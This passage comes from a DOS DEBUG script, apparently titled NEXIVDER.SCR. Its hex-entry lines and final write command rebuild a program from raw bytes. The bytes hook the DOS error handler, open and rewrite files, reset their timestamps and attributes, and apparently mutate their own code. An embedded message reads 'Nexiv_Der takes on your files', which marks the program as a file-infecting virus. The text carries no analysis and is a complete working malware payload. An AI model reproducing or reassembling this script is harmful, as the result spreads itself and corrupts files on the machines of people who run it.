06 00 01 5D CF 2E E 0620 80 3E D0 0F 00 74 2C 80 FC 02 75 27 9C 2E FF 1E E 0630 54 06 72 1C 9C 51 56 57 1E 0E 1F BE D0 0F 8B FB E 0640 B9 20 00 F3 A6 75 04 26 C6 07 CC 1F 5F 5E 59 9D E 0650 CA 02 00 EA 00 00 00 00 55 8B EC 50 8B 46 04 2E E 0660 39 06 FC 0F 58 75 0D 2E 83 3E FE 0F 00 74 07 2E E 0670 FF 0E FE 0F 5D CF FB FC 50 56 1E C5 76 02 8A 04 E 0680 3C E8 74 16 3C E9 74 12 3C 80 75 09 8A 44 01 24 E 0690 C0 3C C0 74 05 1F 5E 58 EB DA 2E 89 36 00 10 2E E 06A0 81 2E 00 10 00 01 57 06 0E 07 BF 8A 0F A4 A5 07 E 06B0 5F 1F 5E 58 50 53 51 52 56 57 55 1E 06 2E 8E 1E E 06C0 FC 0F 2E 8B 36 CE 0F 81 C6 00 01 B9 90 2D 33 DB E 06D0 AC 3C 4E 75 03 43 EB 02 33 DB 81 FB 70 0F 74 28 E 06E0 E2 EE 07 1F 5D 5F 5E 5A 59 5B 58 50 52 1E B8 01 E 06F0 25 2E 8B 16 F0 0F 2E 8E 1E F2 0F CD 21 1F 5A 58 E 0700 81 66 06 FF FE E9 6C FF 81 EE 50 0F 83 E6 F0 81 E 0710 EE 00 01 2E 89 36 02 10 B8 24 35 CD 21 2E 89 1E E 0720 F8 0F 2E 8C 06 FA 0F 0E 1F 0E 07 B8 24 25 BA 44 E 0730 08 CD 21 B8 00 43 BA 8E 0F CD 21 89 0E 0A 10 B8 E 0740 01 43 BA 8E 0F 33 C9 CD 21 B8 02 3D BA 8E 0F CD E 0750 21 73 03 E9 DE 00 8B D8 B8 00 57 CD 21 89 0E 0C E 0760 10 89 16 0E 10 B8 00 42 33 C9 8B 16 00 10 CD 21 E 0770 B4 3F B9 03 00 BA 04 10 CD 21 BE 8A 0F BF 04 10 E 0780 B9 03 00 F3 A6 74 03 E9 8D 00 A1 0C 10 25 1F 00 E 0790 3D 05 00 72 08 3D 06 00 77 03 40 EB 03 B8 05 00 E 07A0 83 26 0C 10 E0 09 06 0C 10 B8 00 42 33 C9 8B 16 E 07B0 00 10 CD 21 A1 02 10 2B 06 00 10 2D 03 00 A3 08 E 07C0 10 53 B4 62 CD 21 4B 8E DB A1 12 00 2D 94 01 8E E 07D0 C0 5B 0E 1F B4 40 B9 03 00 BA 07 10 CD 21 B8 00 E 07E0 42 33 C9 8B 16 02 10 CD 21 0E 1F B4 02 B0 0F B9 E 07F0 30 0F BA 00 01 E8 9F 00 81 F9 30 19 77 EB B4 40 E 0800 CD 21 B8 40 00 8E D8 E4 40 B4 00 8B C8 B4 40 33 E 0810 D2 CD 21 0E 1F 0E 07 B8 01 57 8B 0E 0C 10 8B 16 E 0820 0E 10 CD 21 B4 3E CD 21 B8 01 43 8B 0E 0A 10 BA E 0830 8E 0F CD 21 B8 24 25 8B 16 F8 0F 8E 1E FA 0F CD E 0840 21 E9 9E FE B0 03 CF EB 45 90 FA 33 C0 8E D0 BC E 0850 00 7C 52 5A 0E 1F 0E 07 FB FC 80 FA 80 75 07 B9 E 0860 06 00 B6 00 EB 07 B9 01 4F B6 01 EB 00 B8 0D 02 E 0870 BB 00 7E CD 13 72 F6 81 C3 00 02 FF E3 50 CD 13 E 0880 58 73 02 CD 13 C3 50 9C 2E FF 1E B7 03 58 73 06 E 0890 9C 2E FF 1E B7 03 C3 53 88 26 F5 0C 80 26 F5 0C E 08A0 01 D0 EC 88 26 F6 0C 80 26 F6 0C 01 A2 F7 0C 89 E 08B0 0E F8 0C 89 16 FA 0C 33 FF E8 58 01 E8 99 01 80 E 08C0 3E F5 0C 01 74 0B C6 06 FC 0C 01 B0 9C AA E8 87 E 08D0 01 80 3E F5 0C 01 74 0D B9 07 00 51 E8 FB 01 E8 E 08E0 76 01 59 E2 F6 80 3E F5 0C 01 74 0D B9 02 00 51 E 08F0 E8 0B 02 E8 62 01 59 E2 F6 B0 0E AA B0 1F AA E8 E 0900 56 01 B0 0E AA B0 07 AA E8 4D 01 E8 52 02 E8 47 E 0910 01 E8 69 02 E8 41 01 E8 7B 02 E8 3B 01 E8 87 02 E 0920 E8 35 01 E8 9D 02 E8 5B 01 89 3E 12 0D E8 54 01 E 0930 E8 A0 02 E8 4E 01 E8 4B 01 E8 DB 02 E8 45 01 E8 E 0940 2D 03 E8 3F 01 E8 7F 03 C6 06 FC 0C 00 E8 34 01 E 0950 C6 06 FC 0C 01 E8 84 03 E8 88 03 C6 06 1A 0D FF E 0960 C6 06 1B 0D FF E8 F0 00 80 3E F5 0C 01 74 0D B9 E 0970 02 00 51 E8 D0 01 E8 DF 00 59 E2 F6 80 3E F5 0C E 0980 01 74 0D B9 07 00 51 E8 9E 01 E8 CB 00 59 E2 F6 E 0990 80 3E F5 0C 01 74 0B C6 06 FC 0C 00 B0 9D AA E8 E 09A0 B6 00 80 3E F6 0C 00 74 0E 8B C7 25 0F 00 3C 0F E 09B0 74 05 B0 90 AA EB F2 8B DF 53 B0 CB AA E8 1A F8 E 09C0 89 1E 2E 10 8B 1E 16 0D 26 29 3F 8B 36 FA 0C 8B E 09D0 0E F8 0C F3 A4 57 1E 06 0E B8 E2 09 50 06 33 C0 E 09E0 50 CB 07 1F 5F 5B 26 C6 07 90 57 8B 36 FA 0C 8B E 09F0 FB 47 8B 0E F8 0C 33 C0 A6 75 01 40 E2 FA 8B 0E E 0A00 F8 0C D1 E9 3B C1 72 03 E9 AC FE 5F 8B CF 33 D2 E 0A10 06 1F 5B C3 A0 F5 0C A2 FC 0C A2 FD 0C A2 FE 0C E 0A20 A2 FF 0C A2 00 0D A2 02 0D A2 03 0D A2 04 0D A2 E 0A30 08 0D A2 05 0D BB 09 0D B9 07 00 C6 07 FF 43 E2 E 0A40 FA BB 10 0D B9 02 00 C6 07 FF 43 E2 FA C6 06 1A E 0A50 0D FF C6 06 1B 0D FF C3 E8 C2 02 22 06 F7 0C B4 E 0A60 00 40 8B C8 51 E8 B5 02 B4 00 3D 2A 00 72 05 2D E 0A70 2A 00 EB F6 25 FE FF 05 B0 0A 8B D8 8B 07 FF D0 E 0A80 59 E2 E1 C3 E8 96 02 22 06 F7 0C B4 00 40 8B C8 E 0A90 51 E8 89 02 B4 00 3D 18 00 72 05 2D 18 00 EB F6 E 0AA0 25 FE FF 05 C2 0A 8B D8 8B 07 FF D0 59 E2 E1 C3 E 0AB0 15 0E 22 0E 83 0E 9E 0E B9 0E B9 0E E0 0E E0 0E E 0AC0 05 0F 2F 0E 2F 0E 59 0E 59 0E 14 0F 14 0F 2F 0F E 0AD0 2F 0F 4D 0F 4D 0F 6B 0F 6B 0F BB FD 0C E8 3D 02 E 0AE0 25 07 00 03 D8 80 3F 00 75 F0 C6 07 01 BB 09 0D E 0AF0 80 3F FF 74 03 43 EB F8 88 07 0C 50 AA C3 BB 05 E 0B00 0D E8 19 02 25 03 00 03 D8 80 3F 00 75 F0 C6 07 E 0B10 01 BB 10 0D 80 3F FF 74 03 43 EB F8 88 07 D0 E0 E 0B20 D0 E0 D0 E0 0C 06 AA C3 BB 0F 0D 80 3F FF 75 03 E 0B30 4B EB F8 8A 07 C6 07 FF BB FD 0C B4 00 03 D8 C6 E 0B40 07 00 0C 58 AA C3 BB 11 0D 80 3F FF 75 03 4B EB E 0B50 F8 8A 07 C6 07 FF D0 E0 D0 E0 D0 E0 0C 07 AA C3 E 0B60 B0 E8 AA E8 B7 01 25 0F 00 AB 89 3E 14 0D 3C 00 E 0B70 74 0A 8B C8 51 E8 A5 01 AA 59 E2 F8 C3 E8 A7 01 E 0B80 3C 03 74 08 3C 06 74 04 3C 07 75 F1 A2 1A 0D 50 E 0B90 0C 58 AA 58 C3 B0 81 AA A0 1A 0D 0C E8 AA 89 3E E 0BA0 16 0D A1 14 0D AB C3 E8 73 01 24 02 0C 31 AA E8 E 0BB0 A3 01 A2 1B 0D 8A E0 D0 E4 D0 E4 D0 E4 0A C4 0C E 0BC0 C0 AA C3 E8 76 01 A2 1C 0D 24 03 0C B8 AA E8 4F E 0BD0 01 AB C3 E8 47 01 24 03 3C 02 74 06 3C 01 74 07 E 0BE0 EB 0A B0 26 AA EB 05 B0 2E AA EB 00 B0 30 AA 80 E 0BF0 3E 1A 0D 03 74 0B 80 3E 1A 0D 06 74 08 B0 05 EB E 0C00 08 B0 07 EB 04 B0 04 EB 00 8A 26 1C 0D D0 E4 D0 E 0C10 E4 D0 E4 0A C4 AA C3 E8 03 01 24 07 3C 00 74 12 E 0C20 3C 01 74 15 3C 02 74 1E 3C 03 74 28 3C 04 74 31 E 0C30 EB E5 A0 1A 0D 0C 40 AA C3 B0 83 AA A0 1A 0D 0C E 0C40 C0 AA B0 01 AA C3 B0 81 AA A0 1A 0D 0C C0 AA B8 E 0C50 01 00 AB C3 B0 83 AA A0 1A 0D 0C E8 AA B0 FF AA E 0C60 C3 B0 81 AA A0 1A 0D 0C E8 AA B8 FF FF AB C3 E8 E 0C70 AB 00 24 07 3C 00 74 12 3C 01 74 15 3C 02 74 1E E 0C80 3C 03 74 28 3C 04 74 31 EB E5 A0 1B 0D 0C 40 AA E 0C90 C3 B0 83 AA A0 1B 0D 0C C0 AA B0 01 AA C3 B0 81 E 0CA0 AA A0 1B 0D 0C C0 AA B8 01 00 AB C3 B0 83 AA A0 E 0CB0 1B 0D 0C E8 AA B0 FF AA C3 B0 81 AA A0 1B 0D 0C E 0CC0 E8 AA B8 FF FF AB C3 B0 81 AA A0 1B 0D 0C F8 AA E 0CD0 E8 4A 00 25 0F 00 03 06 F8 0C AB C3 B0 74 AA B0 E 0CE0 03 AA C3 8B C7 2B 06 12 0D 05 03 00 F7 D8 50 B0 E 0CF0 E9 AA 58 AB C3 00 00 00 00 00 00 00 00 00 00 00 E 0D00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 0D10 00 00 00 00 00 00 00 00 00 00 00 00 00 E4 40 C3 E 0D20 E4 40 8A E0 E4 40 C3 E4 40 24 07 3C 04 74 F8 38 E 0D30 06 1A 0D 74 F2 38 06 1B 0D 74 EC C3 E4 40 24 07 E 0D40 50 24 03 38 06 1A 0D 58 74 F2 50 24 03 38 06 1B E 0D50 0D 58 74 E8 C3 E8 2D 00 72 10 E8 CA FF B4 00 BB E 0D60 FD 0C 03 D8 80 3F 01 75 EC F8 C3 E8 29 00 72 14 E 0D70 E8 C9 FF 50 B4 00 24 03 BB FD 0C 03 D8 58 80 3F E 0D80 01 75 E8 F8 C3 BB FD 0C B9 08 00 80 3F 01 74 05 E 0D90 43 E2 F8 F9 C3 F8 C3 BB FD 0C B9 04 00 80 3F 01 E 0DA0 74 05 43 E2 F8 F9 C3 F8 C3 50 24 80 58 74 07 80 E 0DB0 3E FD 0C 01 75 5D 50 24 40 58 74 07 80 3E FE 0C E 0DC0 01 75 50 50 24 20 58 74 07 80 3E FF 0C 01 75 43 E 0DD0 50 24 10 58 74 07 80 3E 00 0D 01 75 36 50 24 08 E 0DE0 58 74 07 80 3E FC 0C 01 75 29 50 24 04 58 74 07 E 0DF0 80 3E 02 0D 01 75 1C 50 24 02 58 74 07 80 3E 03 E 0E00 0D 01 75 0F 50 24 01 58 74 07 80 3E 04 0D 01 75 E 0E10 02 F8 C3 F9 C3 E8 3D FF 72 07 0C B8 AA E8 00 FF E 0E20 AB C3 E8 46 FF 72 07 0C B0 AA E8 F0 FE AA C3 B0 E 0E30 08 E8 75 FF 72 22 E8 1C FF 72 1D 50 B0 81 AA E8 E 0E40 DB FE 24 38 3C 10 74 F7 3C 18 74 F3 8A D8 58 0A E 0E50 C3 0C C0 AA E8 C9 FE AB C3 B0 08 E8 4B FF 72 22 E 0E60 E8 08 FF 72 1D 50 B0 80 AA E8 B1 FE 24 38 3C 10 E 0E70 74 F7 3C 18 74 F3 8A D8 58 0A C3 0C C0 AA E8 9C E 0E80 FE AA C3 E8 CF FE 72 15 50 B0 89 AA E8 C6 FE D0 E 0E90 E0 D0 E0 D0 E0 8A D8 58 0A C3 0C C0 AA C3 E8 CA E 0EA0 FE 72 15 50 B0 88 AA E8 C1 FE D0 E0 D0 E0 D0 E0 E 0EB0 8A D8 58 0A C3 0C C0 AA C3 B0 08 E8 EB FE 72 1F E 0EC0 E8 92 FE 72 1A 50 E8 54 FE 24 3A 0C 01 AA E8 84 E 0ED0 FE D0 E0 D0 E0 D0 E0 8A D8 58 0A C3 0C C0 AA C3 E 0EE0 B0 08 E8 C4 FE 72 1D E8 81 FE 72 18 50 E8 2D FE E 0EF0 24 3A AA E8 75 FE D0 E0 D0 E0 D0 E0 8A D8 58 0A E 0F00 C3 0C C0 AA C3 E8 4D FE 72 09 0C 50 AA E8 45 FE E 0F10 0C 58 AA C3 B0 08 E8 90 FE 72 13 E8 37 FE 72 0E E 0F20 50 E8 F9 FD 24 08 0C 40 8A D8 58 0A C3 AA C3 B0 E 0F30 08 E8 75 FE 72 16 E8 32 FE 72 11 50 B0 FE AA E8 E 0F40 DB FD 24 08 0C C0 8A D8 58 0A C3 AA C3 B0 08 E8 E 0F50 57 FE 72 16 E8 FE FD 72 11 50 B0 D1 AA E8 BD FD E 0F60 24 08 0C C0 8A D8 58 0A C3 AA C3 B0 08 E8 39 FE E 0F70 72 16 E8 F6 FD 72 11 50 B0 D0 AA E8 9F FD 24 08 E 0F80 0C C0 8A D8 58 0A C3 AA C3 00 00 00 00 01 00 00 E 0F90 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 0FA0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 0FB0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 0FC0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 0FD0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 0FE0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 0FF0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 1000 00 00 00 00 00 00 00 E8 00 00 00 00 00 00 00 00 E 1010 4E 65 78 69 76 5F 44 65 72 20 74 61 6B 65 73 20 E 1020 6F 6E 20 79 6F 75 72 20 66 69 6C 65 73 00 RCX 0F2E W Q ;=[END NEXIVDER.SCR]=========================================================